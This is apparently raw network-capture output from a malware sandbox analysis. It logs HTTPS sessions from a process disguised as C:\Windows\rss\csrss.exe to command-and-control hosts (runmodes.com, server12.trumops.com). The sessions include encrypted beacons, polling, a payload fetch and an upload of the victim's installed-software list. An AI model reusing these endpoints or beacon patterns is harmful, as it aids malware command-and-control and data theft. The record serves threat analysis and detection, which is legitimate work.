                                                            0192.168.2.649754104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:38:52 UTC0OUTPOST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 144
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:52 UTC0OUTData Raw: 74 35 71 36 31 48 68 6e 4b 50 54 4e 54 46 37 34 53 42 76 34 37 2f 6f 78 4a 67 53 58 6e 52 33 37 4d 4e 58 39 74 58 46 6b 4d 47 38 37 31 50 5a 4d 43 77 67 35 4c 2f 49 36 46 76 56 5a 59 61 35 72 43 6b 4b 34 57 46 45 6b 33 32 64 63 75 4e 50 79 6e 33 46 4f 71 56 62 55 31 57 44 61 72 67 30 77 76 4a 4c 72 56 64 72 5a 71 71 69 6d 38 4b 36 72 73 75 79 47 32 6d 65 62 76 78 34 52 32 4e 45 4d 71 70 43 61 2f 70 78 6e 4f 65 51 34 62 5a 2b 67
                                                            Data Ascii: t5q61HhnKPTNTF74SBv47/oxJgSXnR37MNX9tXFkMG871PZMCwg5L/I6FvVZYa5rCkK4WFEk32dcuNPyn3FOqVbU1WDarg0wvJLrVdrZqqim8K6rsuyG2mebvx4R2NEMqpCa/pxnOeQ4bZ+g
                                                            2021-10-20 10:38:52 UTC0INHTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:38:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IA3VAWpCIwmBdIRHXxFIkl5iFMPMygQ0fA2kQfeeZgpB%2FyobvqTBT4%2FyM9Ij0LGD7BUoxG5KiMuH62LtN96vARHMP%2FiALNudXv5DVyMM2FgpLXm21nDWMnWh0r%2F48eQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e79d9c85caa-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:52 UTC1INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.649755104.21.79.9443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:38:52 UTC1OUTPOST /bots/post-ia-data?uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 18950
                                                            Content-Type: application/json; charset=UTF-8
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:52 UTC1OUTData Raw: 5b 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 4e 6f 74 65 20 32 30 31 36 20 28 4b 42 34 34 37 35 35 38 36 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22
                                                            Data Ascii: [{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft OneNote 2016 (KB4475586) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"
                                                            2021-10-20 10:38:52 UTC2OUTData Raw: 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 53 68 61 72 65 64 20 36 34 2d 62 69 74 20 53 65 74 75 70 20 4d 65 74 61 64 61 74 61 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 32 20 52 65 64 69 73 74 72 69 62 75 74 61 62 6c 65 20 28 78 36 34 29 20 2d 20 31 31 2e 30 2e 36 31 30 33 30 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f
                                                            Data Ascii: te":"20200723"},{"display_name":"Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030","display_versio
                                                            2021-10-20 10:38:52 UTC4OUTData Raw: 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 63 68 65 64 75 6c 69 6e 67 41 67 65 6e 74 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 41 63 63 65 73 73 20 32 30 31 36 20 28 4b 42 34 34 38 34 31 36 37 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f
                                                            Data Ascii: "install_date":""},{"display_name":"SchedulingAgent","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Access 2016 (KB4484167) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microso
                                                            2021-10-20 10:38:52 UTC5OUTData Raw: 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 32 30 31 36 20 28 4b 42 34 34 38 34 33 30 30 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 31 31 36 33 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65
                                                            Data Ascii: display_name":"Security Update for Microsoft Word 2016 (KB4484300) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4011634) 32-Bit Edition","display_version":"","install_date":""},{"display_name
                                                            2021-10-20 10:38:52 UTC9OUTData Raw: 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 31 39 30 36 32 37 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 28 4b 42 34 30 32 32 32 31 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 75 74 6c 6f 6f 6b 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 37 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f
                                                            Data Ascii: stall_date":"20190627"},{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Outlook 2016 (KB4484274) 32-Bit Edition","display_versio
                                                            2021-10-20 10:38:52 UTC13OUTData Raw: 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 53 68 61 72 65 64 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 31 36 2e 30 2e 34 32 36 36 2e 31 30 30 31 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 32 30 32 30 30 37 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35 33 38 29 20 33 32
                                                            Data Ascii: 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Microsoft Office Shared MUI (English) 2016","display_version":"16.0.4266.1001","install_date":"20200723"},{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32
                                                            2021-10-20 10:38:52 UTC17OUTData Raw: 31 31 32 35 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 31 31 35 37 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 53 6b 79 70 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 4d 55 49 20 28 45 6e 67 6c 69 73 68 29 20 32 30 31 36 22
                                                            Data Ascii: 11259) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB4011574) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Skype for Business MUI (English) 2016"
                                                            2021-10-20 10:38:52 UTC19INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:38:52 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bgH1j2HJCY1PRrFLZl7AB6WEYhGar0eyGh1Olq8Yrqc4KyXlqKkIUG1R2oMtRRN4E%2B5caViwgYNDD%2BHbwz0YxpqhoClLcU1HQOg3gjevpe9gtDOl1RdkeurtWdZscezbsM8CVdgC9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e7accff4a85-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:52 UTC20INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                            Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                            2021-10-20 10:38:52 UTC21INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649756104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:38:56 UTC21OUTPOST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 132
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:56 UTC21OUTData Raw: 73 7a 6e 79 66 79 56 78 38 31 5a 48 49 55 34 67 4f 34 73 6b 38 75 55 54 56 64 77 50 6a 56 66 75 6f 4c 64 44 31 66 52 54 32 52 55 6d 6e 55 67 51 6f 75 5a 59 79 68 4c 6d 62 48 45 33 44 70 39 76 2b 62 36 52 79 6c 39 66 4c 62 55 46 73 52 4a 61 72 76 51 54 6f 5a 6d 75 6b 42 45 31 38 35 76 44 66 36 74 46 56 6f 42 68 69 4d 43 79 43 33 43 55 76 59 44 6a 6c 77 33 64 32 58 6a 4f 53 4b 6d 50 4d 51 3d 3d
                                                            Data Ascii: sznyfyVx81ZHIU4gO4sk8uUTVdwPjVfuoLdD1fRT2RUmnUgQouZYyhLmbHE3Dp9v+b6Ryl9fLbUFsRJarvQToZmukBE185vDf6tFVoBhiMCyC3CUvYDjlw3d2XjOSKmPMQ==
                                                            2021-10-20 10:38:56 UTC22INHTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:38:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WAG1C17CY4fCRL2LJN8e3aq%2B7HlcLFCGPD8XnoUjXX2k9n9%2Fnm4Q7C6j7xR32dkjKcSijYOyc%2FXTdhTFMOGvjP1xoSHLb60d0D4rtoXfM%2F8vIhSFU6Qsn4D4xZiGi5w%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e9479b96946-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:56 UTC22INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            3192.168.2.649757172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:38:57 UTC22OUTPOST /api/poll HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:74.0) Gecko/20100101 Firefox/74.0
                                                            Content-Length: 644
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:38:57 UTC22OUTData Raw: 4e 72 37 76 63 74 32 55 76 66 7a 76 32 51 4b 33 69 66 38 48 67 4e 54 62 66 2b 77 50 4a 38 42 55 39 4c 49 47 58 62 6e 67 6b 65 57 4d 4b 5a 5a 54 74 67 63 45 79 2f 54 70 66 38 7a 50 56 2b 6a 6c 70 33 2b 67 48 76 78 36 6d 65 31 61 65 66 50 2f 6f 31 42 63 64 64 67 50 4b 66 75 43 5a 4c 48 70 41 35 59 58 41 59 71 38 50 63 53 35 4c 63 31 74 72 67 37 75 58 30 4f 4a 7a 66 68 4d 50 58 68 6b 35 74 6e 79 7a 33 46 79 4c 75 73 4f 77 77 46 41 6b 4e 4b 69 45 57 69 79 6b 68 44 69 41 69 59 68 50 69 65 74 71 42 4a 4a 68 64 4f 37 78 57 67 4e 71 54 43 4d 6f 64 41 4b 79 6f 34 74 57 56 41 34 42 76 64 2b 49 54 39 54 4a 4b 35 36 32 4e 49 6d 6b 63 56 6f 67 6c 36 77 69 31 4c 42 4c 58 76 69 75 6d 36 47 4a 56 6c 33 63 4c 30 43 38 58 7a 2f 6a 46 64 42 50 4d 72 41 52 45 75 39 44 4b 63
                                                            Data Ascii: Nr7vct2Uvfzv2QK3if8HgNTbf+wPJ8BU9LIGXbngkeWMKZZTtgcEy/Tpf8zPV+jlp3+gHvx6me1aefP/o1BcddgPKfuCZLHpA5YXAYq8PcS5Lc1trg7uX0OJzfhMPXhk5tnyz3FyLusOwwFAkNKiEWiykhDiAiYhPietqBJJhdO7xWgNqTCModAKyo4tWVA4Bvd+IT9TJK562NImkcVogl6wi1LBLXvium6GJVl3cL0C8Xz/jFdBPMrAREu9DKc
                                                            2021-10-20 10:38:57 UTC23INHTTP/1.1 404 Not Found
                                                            Date: Wed, 20 Oct 2021 10:38:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            set-cookie: PHPSESSID=er4u6n5slre08iuqa9ddhgfmgo; path=/; HttpOnly
                                                            expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            cache-control: no-store, no-cache, must-revalidate
                                                            pragma: no-cache
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Rgb7JlualPWZhQeqXYWeh98Yrz9b8%2BunEhKY0AvJLX2REx0Xd8N8HyfLKgF2ERcI3yi3xhLeBgnu5NHC6J9E5ruHDbsbBALuGedShIpMoxThl84EGih4rVj%2FVnDNpL%2BZGrUMIAbITQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119e9beb7542db-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:38:57 UTC24INData Raw: 65 38 0d 0a 49 4b 4f 4e 6f 34 30 5a 4f 77 41 62 2f 46 36 37 5a 6d 55 6e 52 50 4e 4f 7a 73 55 48 4c 69 37 42 59 30 43 77 78 41 6c 6e 62 55 35 79 39 69 69 75 58 6b 62 61 61 61 43 67 49 4a 75 55 50 45 34 77 45 36 71 50 6a 45 38 38 68 4b 45 4c 6d 47 6a 79 52 42 39 44 57 59 4d 35 6e 47 2f 67 62 78 48 44 36 56 65 67 66 57 6e 58 77 62 72 58 69 75 55 61 39 74 52 56 33 4e 6d 7a 4b 78 46 55 79 4b 42 47 71 35 35 36 62 67 53 71 51 4a 69 4a 4b 32 64 49 66 75 36 31 56 66 56 6a 53 76 53 7a 47 4e 55 48 45 53 41 4d 69 77 68 54 44 65 30 6d 76 33 50 71 73 57 50 6e 4e 46 33 67 4e 59 54 48 38 54 39 77 4f 32 51 39 67 38 4a 46 71 73 66 6c 5a 59 4f 4f 6c 4a 6d 4f 34 30 37 4a 4b 44 46 32 42 42 4a 58 6d 48 6f 76 41 77 3d 3d 0d 0a
                                                            Data Ascii: e8IKONo40ZOwAb/F67ZmUnRPNOzsUHLi7BY0CwxAlnbU5y9iiuXkbaaaCgIJuUPE4wE6qPjE88hKELmGjyRB9DWYM5nG/gbxHD6VegfWnXwbrXiuUa9tRV3NmzKxFUyKBGq556bgSqQJiJK2dIfu61VfVjSvSzGNUHESAMiwhTDe0mv3PqsWPnNF3gNYTH8T9wO2Q9g8JFqsflZYOOlJmO407JKDF2BBJXmHovAw==
                                                            2021-10-20 10:38:57 UTC24INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            4192.168.2.649764172.67.139.144443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:39:11 UTC24OUTGET /api/cdn?c=177c2a906396ff21&uuid=8cf49c60-c834-48e4-bacd-9cc30e6a4460 HTTP/1.1
                                                            Host: server12.trumops.com
                                                            User-Agent: Go-http-client/1.1
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:11 UTC24INHTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            access-control-allow-credentials: false
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OU3TKovUnyVfa5aW6T50VtWrFT3%2BH1sRnfcVAqrxJ%2BPPZMG0NSBVGgwF0ofgapIo5pdxOmXkljw3ehz%2BtQj1ZwAzmI1B%2Fz9dESPct7o5VpfyIxFpaRGOeCzFcArWbas2HxeaR93nwQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119ef1ddf7696f-FRA
                                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                            2021-10-20 10:39:11 UTC25INData Raw: 31 33 34 0d 0a 73 43 39 30 6e 6f 6e 4a 47 2f 4c 6d 65 72 74 56 64 61 37 51 67 43 4c 70 4f 74 62 38 46 35 31 43 35 57 77 49 4f 63 4a 66 4c 47 71 7a 7a 6b 71 7a 6a 2f 6e 77 37 6e 44 76 38 2f 70 6e 78 7a 78 36 35 6f 72 30 56 4e 50 55 63 53 43 30 4e 2f 77 74 57 39 37 67 58 52 6e 5a 31 62 53 6d 35 6b 31 54 2b 68 43 61 36 76 32 42 64 33 2f 65 48 62 36 55 30 36 73 75 48 61 45 76 41 6d 67 74 67 57 73 36 45 67 34 44 70 2b 5a 61 37 45 71 43 70 68 66 58 6f 45 59 64 47 42 58 62 68 31 56 34 32 4d 4b 31 48 7a 30 32 67 6f 62 34 74 44 36 39 50 33 73 67 6a 52 63 52 37 49 51 54 74 53 4c 73 6d 75 37 4d 63 36 48 51 59 35 38 32 46 4a 66 34 37 38 75 6b 43 47 72 75 76 43 54 71 54 73 63 64 41 47 6a 53 71 37 47 7a 77 54 71 47 79 33 39 6a 6c 66 6a 45 54 56 38 71 62 56 4f 56 42 58
                                                            Data Ascii: 134sC90nonJG/LmertVda7QgCLpOtb8F51C5WwIOcJfLGqzzkqzj/nw7nDv8/pnxzx65or0VNPUcSC0N/wtW97gXRnZ1bSm5k1T+hCa6v2Bd3/eHb6U06suHaEvAmgtgWs6Eg4Dp+Za7EqCphfXoEYdGBXbh1V42MK1Hz02gob4tD69P3sgjRcR7IQTtSLsmu7Mc6HQY582FJf478ukCGruvCTqTscdAGjSq7GzwTqGy39jlfjETV8qbVOVBX
                                                            2021-10-20 10:39:11 UTC26INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            5192.168.2.649768104.21.34.203443C:\Windows\rss\csrss.exe
                                                            TimestampkBytes transferredDirectionData
                                                            2021-10-20 10:39:19 UTC26OUTPOST /api/log HTTP/1.1
                                                            Host: runmodes.com
                                                            User-Agent: Go-http-client/1.1
                                                            Content-Length: 160
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept-Encoding: gzip
                                                            2021-10-20 10:39:19 UTC26OUTData Raw: 43 36 43 51 69 2f 74 5a 62 52 35 70 46 37 71 6b 31 65 63 58 37 77 52 42 2f 44 42 4e 78 59 33 37 41 61 71 39 33 34 31 4d 59 39 78 6e 79 4d 62 4f 6e 45 69 48 65 68 39 7a 44 48 33 68 2b 76 6b 59 42 4b 4d 6b 63 61 72 68 4e 48 6d 6d 7a 4f 68 58 33 2f 37 6d 6f 5a 45 43 42 77 77 7a 50 42 6f 6a 50 43 70 39 6b 61 43 79 35 6e 37 4f 36 48 4c 64 54 47 48 76 51 32 4d 56 4b 34 37 72 52 4e 6a 69 47 54 79 74 63 74 77 7a 6b 34 2b 59 30 36 43 67 37 73 6c 76 37 66 75 4e 42 73 44 4d 7a 67 3d 3d
                                                            Data Ascii: C6CQi/tZbR5pF7qk1ecX7wRB/DBNxY37Aaq9341MY9xnyMbOnEiHeh9zDH3h+vkYBKMkcarhNHmmzOhX3/7moZECBwwzPBojPCp9kaCy5n7O6HLdTGHvQ2MVK47rRNjiGTytctwzk4+Y06Cg7slv7fuNBsDMzg==
                                                            2021-10-20 10:39:19 UTC26INHTTP/1.1 200 OK
                                                            Date: Wed, 20 Oct 2021 10:39:19 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            x-powered-by: PHP/8.0.11
                                                            CF-Cache-Status: DYNAMIC
                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G44PUacMAxNS3Dq3Hk81qdl9psprUpXBwU23ptXbEaEkrCGL%2B1UoonL513RscNDGZFQfAO0dQlt6BuUQmlOqgkPnhEo6anACNiZOT35%2BHXJ0uOPTI%2Bb%2B5xDf%2FuwLDG8%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 6a119f2008d7432d-FRA
